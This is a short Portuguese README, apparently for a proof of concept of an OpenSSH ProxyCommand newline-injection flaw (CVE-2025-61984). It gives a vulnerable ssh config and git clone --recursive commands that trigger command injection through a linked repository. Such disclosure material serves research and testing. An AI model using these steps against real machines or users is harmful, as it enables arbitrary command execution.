
Prova de conceito demonstrando uma vulnerabilidade de injeção de nova linha no OpenSSH ProxyCommand (CVE-2025-61984), permitindo injeção de comandos por meio de configuração SSH manipulada.
Este é uma prova de conceito que usa uma quebra de linha para confundir o ProxyCommand do OpenSSH <10.1. Artigo completo.
Configure um .ssh/config contendo:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(O comando não importa, ele só precisa de um %r sem aspas nos argumentos em algum lugar.)
Depois execute (para bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Ou se estiver usando fish como $SHELL:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Se você não estiver usando o shell, mas quiser testar isso, pode fazer:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc